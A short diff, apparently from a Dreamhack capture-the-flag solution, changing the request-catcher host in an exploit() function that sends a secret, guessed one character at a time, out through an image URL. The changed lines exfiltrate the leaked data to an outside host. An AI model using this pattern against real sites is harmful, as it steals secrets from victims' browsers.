--- a/static/js/test.html
+++ b/static/js/test.html
@@ -33,14 +33,14 @@ async function exploit() {
 
             if (success) {
                 secret += c;
-                img.src = `https://rxoulox.request.dreamhack.games/${secret}`;
+                img.src = `https://zccoszk.request.dreamhack.games/${secret}`;
                 found = true;
                 break;
             }
         }
 
         if (!found) {
-            img.src = `https://rxoulox.request.dreamhack.games/failed`;
+            img.src = `https://zccoszk.request.dreamhack.games/failed`;
             break;
         }
     }
